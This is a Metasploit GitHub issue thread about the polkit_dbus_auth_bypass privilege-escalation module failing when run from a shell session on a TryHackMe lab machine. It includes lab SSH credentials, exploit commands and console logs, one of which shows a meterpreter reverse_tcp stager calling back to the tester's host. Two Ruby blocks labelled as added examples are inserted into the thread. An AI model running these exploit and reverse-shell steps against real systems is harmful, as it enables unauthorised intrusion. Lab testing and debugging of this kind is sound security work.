polkit_dbus_auth_bypass not working #17227

Closed
Signum21 opened this issue Nov 4, 2022 · 4 comments · Fixed by #17299
Labels: bug, cmd_exec is broken again

Comments


Signum21 commented Nov 4, 2022

Steps to reproduce

  1. Open SSH session:
    use auxiliary/scanner/ssh/ssh_login
    set username tryhackme
    set password TryHackMe123!
    set rhosts TRYHACKME_MACHINE_IP
    run

  2. Run exploit:
    use exploit/linux/local/polkit_dbus_auth_bypass
    set iterations 100
    set session 1
    set lhost VPN_LOCAL_IP
    run

  • Local machine information:
    Kali WSL-2
    uname -a: Linux DESKTOP-NAME 5.10.102.1-microsoft-standard-WSL2 #1 SMP Wed Mar 2 00:30:59 UTC 2022 x86_64 GNU/Linux

  • Remote machine information:
    uname -a: Linux polkit 5.8.0-1035-aws #37~20.04.1-Ubuntu SMP Tue Jun 1 09:54:15 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
    apt list --installed | grep policykit-1: policykit-1/focal,now 0.105-26ubuntu1 amd64 [installed,upgradable to: 0.105-26ubuntu1.1]

Were you following a specific guide/tutorial or reading documentation?

I'm doing this TryHackMe free room:
https://tryhackme.com/room/polkit

I completed the tutorial using the manual commands and can confirm that the machine is working and is vulnerable.

Expected behavior

The exploit should create a user, set a password for it and remove the user.

Current behavior

The user is created successfully but the next steps fail.

Metasploit version

Framework: 6.2.23-dev
Console : 6.2.23-dev

Additional Information

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

[framework/core]
loglevel=3

[framework/ui/console]
ActiveModule=exploit/linux/local/polkit_dbus_auth_bypass

[linux/local/polkit_dbus_auth_bypass]
WORKSPACE=
VERBOSE=false
WfsDelay=2
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
SESSION=1
EXE::EICAR=false
EXE::Custom=
EXE::Path=
EXE::Template=
EXE::Inject=false
EXE::OldMethod=false
EXE::FallBack=false
MSI::EICAR=false
MSI::Custom=
MSI::Path=
MSI::Template=
MSI::UAC=false
FileDropperDelay=
AllowNoCleanup=false
USERNAME=msf
PASSWORD=8eWdoPns
TIMEOUT=30
ITERATIONS=100
WritableDir=/tmp
AutoCheck=true
ForceExploit=false
PAYLOAD=linux/x86/meterpreter/reverse_tcp
LHOST=VPN_LOCAL_IP

Database Configuration

The database contains the following information:

Session Type: postgresql selected, no connection

History

The following commands were run during the session and before this issue occurred:

662    set loglevel 3
663    use auxiliary/scanner/ssh/ssh_login
664    set username tryhackme
665    set password TryHackMe123!
666    set rhosts TRYHACKME_MACHINE_IP
667    run
668    use exploit/linux/local/polkit_dbus_auth_bypass
669    set iterations 100
670    set session 1
671    set lhost VPN_LOCAL_IP
672    run
673    debug

Framework Errors

The following framework errors occurred before the issue occurred:

[11/03/2022 22:56:03] [e(0)] core: Failed to connect to the database: No database YAML file
[11/03/2022 22:56:27] [e(0)] core: Unexpected output running /usr/share/metasploit-framework/modules/exploits/linux/smtp/haraka.py:
/usr/share/metasploit-framework/modules/exploits/linux/smtp/haraka.py:14: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
  from distutils.version import StrictVersion

[11/03/2022 22:56:45] [e(0)] core: /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go failed to load - LoadError Failed to execute external Go module. Please ensure you have Go installed on your environment.
[11/03/2022 22:56:45] [e(0)] core: /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go failed to load - LoadError Failed to execute external Go module. Please ensure you have Go installed on your environment.
[11/03/2022 22:56:45] [e(0)] core: /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go failed to load - LoadError Failed to execute external Go module. Please ensure you have Go installed on your environment.
[11/03/2022 23:18:01] [e(0)] core: Exception encountered in cmd_set - Msf::OptionValidateError The following options failed to validate: Value 'get' is not valid for option 'HTTP_METHOD'.
[11/03/2022 23:18:56] [e(0)] core: Exploit failed (multi/http/spring_framework_rce_spring4shell): Interrupt  - Interrupt
[11/03/2022 23:19:36] [e(0)] core: Exploit failed (multi/http/spring_framework_rce_spring4shell): Interrupt  - Interrupt
[11/04/2022 19:03:37] [e(0)] core: Failed to connect to the database: No database YAML file
[11/04/2022 19:25:27] [e(0)] core: Failed to connect to the database: No database YAML file

Web Service Errors

The following web service errors occurred before the issue occurred:

msf-ws.log does not exist.

Framework Logs

The following framework logs were recorded before the issue occurred:

[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell/reverse_tcp with linux/local/polkit_dbus_auth_bypass]: tunnel to reverse
[11/04/2022 19:45:45] [d(1)] core: Module linux/x86/shell/reverse_tcp is compatible with linux/local/polkit_dbus_auth_bypass
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell/reverse_tcp_uuid with linux/local/polkit_dbus_auth_bypass]: reverse to reverse
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell/reverse_tcp_uuid with linux/local/polkit_dbus_auth_bypass]: bind to reverse
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell/reverse_tcp_uuid with linux/local/polkit_dbus_auth_bypass]: noconn to reverse
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell/reverse_tcp_uuid with linux/local/polkit_dbus_auth_bypass]: none to reverse
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell/reverse_tcp_uuid with linux/local/polkit_dbus_auth_bypass]: tunnel to reverse
[11/04/2022 19:45:45] [d(1)] core: Module linux/x86/shell/reverse_tcp_uuid is compatible with linux/local/polkit_dbus_auth_bypass
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_ipv6_tcp with linux/local/polkit_dbus_auth_bypass]: reverse to bind
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_ipv6_tcp with linux/local/polkit_dbus_auth_bypass]: bind to bind
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_ipv6_tcp with linux/local/polkit_dbus_auth_bypass]: noconn to bind
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_ipv6_tcp with linux/local/polkit_dbus_auth_bypass]: none to bind
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_ipv6_tcp with linux/local/polkit_dbus_auth_bypass]: tunnel to bind
[11/04/2022 19:45:45] [d(1)] core: Module linux/x86/shell_bind_ipv6_tcp is compatible with linux/local/polkit_dbus_auth_bypass
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_tcp with linux/local/polkit_dbus_auth_bypass]: reverse to bind
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_tcp with linux/local/polkit_dbus_auth_bypass]: bind to bind
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_tcp with linux/local/polkit_dbus_auth_bypass]: noconn to bind
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_tcp with linux/local/polkit_dbus_auth_bypass]: none to bind
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_tcp with linux/local/polkit_dbus_auth_bypass]: tunnel to bind
[11/04/2022 19:45:45] [d(1)] core: Module linux/x86/shell_bind_tcp is compatible with linux/local/polkit_dbus_auth_bypass
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_tcp_random_port with linux/local/polkit_dbus_auth_bypass]: reverse to none
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_tcp_random_port with linux/local/polkit_dbus_auth_bypass]: bind to none
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_tcp_random_port with linux/local/polkit_dbus_auth_bypass]: noconn to none
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_tcp_random_port with linux/local/polkit_dbus_auth_bypass]: none to none
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_tcp_random_port with linux/local/polkit_dbus_auth_bypass]: tunnel to none
[11/04/2022 19:45:45] [d(1)] core: Module linux/x86/shell_bind_tcp_random_port is compatible with linux/local/polkit_dbus_auth_bypass
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_find_port with linux/local/polkit_dbus_auth_bypass]: reverse to find
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_find_port with linux/local/polkit_dbus_auth_bypass]: bind to find
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_find_port with linux/local/polkit_dbus_auth_bypass]: noconn to find
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_find_port with linux/local/polkit_dbus_auth_bypass]: none to find
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_find_port with linux/local/polkit_dbus_auth_bypass]: tunnel to find
[11/04/2022 19:45:45] [d(1)] core: Module linux/x86/shell_find_port is incompatible with linux/local/polkit_dbus_auth_bypass for ConnectionType: limiter was reverse bind noconn none tunnel, value was find
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_find_tag with linux/local/polkit_dbus_auth_bypass]: reverse to find
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_find_tag with linux/local/polkit_dbus_auth_bypass]: bind to find
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_find_tag with linux/local/polkit_dbus_auth_bypass]: noconn to find
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_find_tag with linux/local/polkit_dbus_auth_bypass]: none to find
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_find_tag with linux/local/polkit_dbus_auth_bypass]: tunnel to find
[11/04/2022 19:45:45] [d(1)] core: Module linux/x86/shell_find_tag is incompatible with linux/local/polkit_dbus_auth_bypass for ConnectionType: limiter was reverse bind noconn none tunnel, value was find
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_reverse_tcp with linux/local/polkit_dbus_auth_bypass]: reverse to reverse
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_reverse_tcp with linux/local/polkit_dbus_auth_bypass]: bind to reverse
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_reverse_tcp with linux/local/polkit_dbus_auth_bypass]: noconn to reverse
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_reverse_tcp with linux/local/polkit_dbus_auth_bypass]: none to reverse
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_reverse_tcp with linux/local/polkit_dbus_auth_bypass]: tunnel to reverse
[11/04/2022 19:45:45] [d(1)] core: Module linux/x86/shell_reverse_tcp is compatible with linux/local/polkit_dbus_auth_bypass
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_reverse_tcp_ipv6 with linux/local/polkit_dbus_auth_bypass]: reverse to reverse
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_reverse_tcp_ipv6 with linux/local/polkit_dbus_auth_bypass]: bind to reverse
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_reverse_tcp_ipv6 with linux/local/polkit_dbus_auth_bypass]: noconn to reverse
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_reverse_tcp_ipv6 with linux/local/polkit_dbus_auth_bypass]: none to reverse
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_reverse_tcp_ipv6 with linux/local/polkit_dbus_auth_bypass]: tunnel to reverse
[11/04/2022 19:45:45] [d(1)] core: Module linux/x86/shell_reverse_tcp_ipv6 is compatible with linux/local/polkit_dbus_auth_bypass

Web Service Logs

The following web service logs were recorded before the issue occurred:

msf-ws.log does not exist.

Version/Install

The versions and install method of your Metasploit setup:

Framework: 6.2.23-dev
Ruby: ruby 3.0.4p208 (2022-04-12 revision 3fa771dded) [x86_64-linux-gnu]
OpenSSL: OpenSSL 3.0.5 5 Jul 2022
Install Root: /usr/share/metasploit-framework
Session Type: postgresql selected, no connection
Install Method: It was either preinstalled or installed through a metapackage like sudo apt install kali-tools-top10
Signum21 added the bug label Nov 4, 2022

adfoster-r7 (Contributor) commented

I haven't confirmed this particular issue, but I know I ran into an issue with the polkit_dbus_auth_bypass module on a different environment where I had to modify this line as the output of pkexec --version on the environment was different than the hard coded match:

unless cmd_exec('pkexec --version') =~ /pkexec version (\d+\S*)/
  return CheckCode::Safe('The polkit framework is not installed.')
end

I wouldn't have the cycles to confirm that it's the same issue here, but potentially the author @jheysel-r7 might be able to look. If not - pull requests are always welcome for module improvements and bug fixes 💯
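
The check quoted above fails closed: any banner that does not literally read "pkexec version N" makes the module report the host as Safe. The following is an added example, not code from the metasploit-framework module or from anyone in this thread, that parses the same banner more tolerantly and keeps the upstream number apart from a packaging suffix. STRICT_PATTERN is the module's own regex; TOLERANT_PATTERN, parse_pkexec_version, version_verdict and the fixed_in threshold passed by the caller are assumptions made for the illustration. Of the sample banners, "pkexec version 0.105" is what the Ubuntu 20.04 package in this report prints and "pkexec version 121" is the integer style newer polkit releases use; the remaining two are constructed.

```ruby
require 'rubygems' # Gem::Version, part of the standard library

# The module's own check (quoted above in this thread) only accepts this shape.
STRICT_PATTERN = /pkexec version (\d+\S*)/

# Tolerant alternative: "pkexec"/"polkit", anything but digits on the same line,
# then the upstream number, then any packaging suffix glued to it.
TOLERANT_PATTERN = /\b(?:pkexec|polkit)\w*\b[^\d\n]*?(\d+(?:\.\d+)*)(\S*)/i

PkexecVersion = Struct.new(:version, :suffix, :raw)

# True when the module's hard-coded regex would have accepted this banner.
def module_check_accepts?(output)
  !(STRICT_PATTERN =~ output.to_s).nil?
end

# Returns a PkexecVersion or nil. Only the dotted/plain number becomes the
# Gem::Version; a suffix such as "-26ubuntu1" is kept separately so that it
# is not mis-parsed as a pre-release segment (which would sort *below* 0.105).
def parse_pkexec_version(output)
  m = TOLERANT_PATTERN.match(output.to_s)
  return nil unless m

  PkexecVersion.new(Gem::Version.new(m[1]), m[2].to_s, m[0])
end

# Compares the upstream number with a caller-supplied fixed_in version (the
# caller's assumption, not something read from the target). Distro builds can
# be patched or unpatched at the same upstream number (this report lists
# 0.105-26ubuntu1 upgradable to 0.105-26ubuntu1.1; both print "pkexec version
# 0.105"), so the verdict is advisory and an active check is still needed.
def version_verdict(output, fixed_in:)
  parsed = parse_pkexec_version(output)
  return :unknown if parsed.nil?

  parsed.version < Gem::Version.new(fixed_in) ? :possibly_vulnerable : :patched
end

SAMPLE_BANNERS = [
  "pkexec version 0.105\n",            # Ubuntu 20.04, policykit-1 0.105-*
  "pkexec version 121\n",              # newer polkit releases use integers
  "polkit version 0.118\n",            # constructed variant, not a real banner
  "bash: pkexec: command not found\n", # polkit not installed at all
].freeze

if $PROGRAM_NAME == __FILE__
  SAMPLE_BANNERS.each do |banner|
    # '0.119' below is an assumed threshold for the illustration only.
    puts format('%-38p strict=%-5s parsed=%-6s verdict=%s',
                banner, module_check_accepts?(banner),
                parse_pkexec_version(banner)&.version,
                version_verdict(banner, fixed_in: '0.119'))
  end
end
```

Run it stand-alone to see which banners the strict regex rejects; in a module, the verdict would feed CheckCode::Appears at most, never CheckCode::Vulnerable, because the banner cannot tell a patched distro build from an unpatched one.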


Signum21 commented Nov 9, 2022

That's not the error I receive: the user is created successfully, but the other two steps fail (password change and user deletion).
Looking at the code, the error lines are 395 and 402:

print_error("Attempted to set the password #{datastore['Iterations']} times, did not work.")
print_warning("Unable to remove user: #{datastore['USERNAME']}, created during the running of this module")

jheysel-r7 self-assigned this Nov 9, 2022

jheysel-r7 commented Nov 9, 2022

Hey @Signum21, thanks for bringing up this issue. I was able to follow your steps above to reproduce this using auxiliary/scanner/ssh/ssh_login to start the initial session:

msf6 exploit(linux/local/polkit_dbus_auth_bypass) > run

[*] Started reverse TCP handler on 192.168.2.114:4444
[!] AutoCheck is disabled, proceeding with exploitation
[*] Attempting to create user fred
[+] User fred created with UID 1005
[*] Attempting to set the password of the newly created user, fred, to: derp
[*] 172.16.199.131 - SSH session 4 closed.
[-] Exploit failed: EOFError EOFError
[*] Exploit completed, but no session was created.

Depending on ITERATIONS and the determined @cmd_delay you'll get slightly different outcomes when running the module. After lots of testing, the most common outcome was that after exploit_set_password was called, the initial session would be closed and an EOFError: EOFError would be thrown.

I paused execution before exploit_set_password was called and closed the session. I ran it myself and noticed:

[1] pry(#<Msf::Modules::Exploit__Linux__Local__Polkit_dbus_auth_bypass::MetasploitModule>)> exploit_set_password(uid, create_unix_crypt_hash, loop_sequence)
[*] 172.16.199.131 - SSH session 7 closed.
EOFError: EOFError
from /Users/jheysel/.rvm/gems/ruby-3.0.2@metasploit-framework/gems/rex-core-0.1.28/lib/rex/io/stream.rb:124:in `rescue in has_read_data?'
Caused by Errno::EBADF: Bad file descriptor
from /Users/jheysel/.rvm/gems/ruby-3.0.2@metasploit-framework/gems/rex-core-0.1.28/lib/rex/io/stream.rb:116:in `select'

I'm not sure what about the session type shell linux causes the session to close when exploit_set_password is run. It's strange that the methods exploit_set_username and exploit_delete_user don't cause the session to be closed.

I noticed that if your session is meterpreter x64/linux this doesn't happen (using exploit/multi/ssh/sshexec for the initial session).

msf6 > use exploit/multi/ssh/sshexec
msf6 exploit(multi/ssh/sshexec) > run payload=linux/x64/meterpreter/reverse_tcp  rhosts=172.16.199.131 username=msfuser password=notpassword lhost=172.16.199.1

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] 172.16.199.131:22 - Sending stager...
[*] Command Stager progress -  46.74% done (402/860 bytes)
[*] Sending stage (3045348 bytes) to 172.16.199.131
[*] Meterpreter session 3 opened (172.16.199.1:4444 -> 172.16.199.131:42142) at 2022-11-09 18:26:06 -0500
[!] Timed out while waiting for command to return
[*] Command Stager progress - 100.00% done (860/860 bytes)

meterpreter > bg
[*] Backgrounding session 3...
msf6 exploit(multi/ssh/sshexec) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information               Connection
  --  ----  ----                   -----------               ----------
  1         shell linux            SSH jheysel @             172.16.199.1:53621 -> 172.16.199.131:22 (172.16.199.131)
  3        meterpreter x64/linux  msfuser @ 172.16.199.131  172.16.199.1:4444 -> 172.16.199.131:42142 (172.16.199.131)

I'm not sure if we could improve the exploit in order to work with shell sessions, or if we need to put a guard to ensure a meterpreter session is in use. @AlanFoster - just off the top of your head, does a reason why shell sessions wouldn't work here come to mind?
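
To make the two outcomes in this comment concrete, here is an added example, not code from the metasploit-framework module or from anyone in this thread, of the create/set-password/delete sequence guarded the way the comment asks about: it refuses non-meterpreter sessions up front, and when the transport dies inside the retry loop and Rex raises EOFError (the trace above), it reports the account left behind instead of failing with a bare "Exploit failed: EOFError" and the later "Unable to remove user" warning. FakeSession, Report, run_user_flow, COMMANDS and the success marker are all assumptions constructed for the illustration; FakeSession only models `type` and `cmd_exec`, and its scripted replies are not real command output.

```ruby
# Constructed stand-in for an Msf::Session. `responses` scripts what each
# cmd_exec call returns; the symbol :eof makes the call raise EOFError, which
# is how Rex::IO::Stream surfaces a stream whose descriptor went bad.
class FakeSession
  attr_reader :type, :commands_run

  def initialize(type, responses)
    @type = type
    @responses = responses.dup
    @commands_run = []
  end

  def cmd_exec(cmd)
    @commands_run << cmd
    reply = @responses.shift || ''
    raise EOFError, 'session closed while waiting for command output' if reply == :eof

    reply
  end
end

Report = Struct.new(:status, :password_attempts, :leftover_user, :detail)

# The three steps the report expects (create user, set password, remove user)
# with two guards: refuse session types the steps cannot run on, and turn a
# mid-loop EOFError into a report naming the account that could not be cleaned
# up. `commands` and `success_marker` are placeholders supplied by the caller;
# the real commands live in the module and are not reproduced here.
def run_user_flow(session, username:, iterations:, commands:, success_marker:)
  unless session.type == 'meterpreter'
    return Report.new(:unsupported_session, 0, nil,
                      "#{session.type} session cannot be used; open a meterpreter session first")
  end

  created = false
  attempts = 0
  begin
    created = session.cmd_exec(commands[:create]).include?(username)
    return Report.new(:create_failed, 0, nil, 'user was not created') unless created

    iterations.times do
      attempts += 1
      out = session.cmd_exec(commands[:set_password])
      next unless out.include?(success_marker)

      session.cmd_exec(commands[:delete])
      return Report.new(:success, attempts, nil, 'password set and user removed')
    end

    session.cmd_exec(commands[:delete])
    Report.new(:exhausted, attempts, nil, "password not set after #{iterations} attempts")
  rescue EOFError => e
    # No further cmd_exec is possible on a dead transport, so the cleanup step
    # cannot run; report the leftover so the operator can remove it by hand.
    Report.new(:session_lost, attempts, created ? username : nil, e.message)
  end
end

# Placeholder command strings for the illustration only.
COMMANDS = { create: 'step:create-user', set_password: 'step:set-password',
             delete: 'step:delete-user' }.freeze

if $PROGRAM_NAME == __FILE__
  shell = FakeSession.new('shell', ['uid=1005(msf)'])
  p run_user_flow(shell, username: 'msf', iterations: 100, commands: COMMANDS, success_marker: 'ok')

  dying = FakeSession.new('meterpreter', ['uid=1005(msf)', '', :eof])
  p run_user_flow(dying, username: 'msf', iterations: 100, commands: COMMANDS, success_marker: 'ok')
end
```

The attempt counter in the :session_lost report is what you would want logged here: the comment notes that the outcome varies with ITERATIONS and @cmd_delay, and knowing on which attempt the session dropped is the first thing needed to tell a timing problem from a broken transport.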

smcintyre-r7 added a commit that referenced this issue Nov 28, 2022
Fixes #17227 - polkit_dbus_auth_bypass module when run from a command…
adfoster-r7 (Contributor) commented

just off the top of your head, does a reason why shell sessions wouldn't work here come to mind?

Whoops - forgot to reply to this at the time, the account ping was to @alanfoster instead of @adfoster-r7. It looked like a regression in the cmd_exec changes - so we asked smashery to take a look at this behind the scenes 👍

adfoster-r7 added the cmd_exec is broken again label Nov 28, 2022
cn-kali-team pushed a commit to cn-kali-team/metasploit-framework that referenced this issue Jan 5, 2023
cgranleese-r7 pushed a commit to cgranleese-r7/metasploit-framework that referenced this issue Jan 23, 2023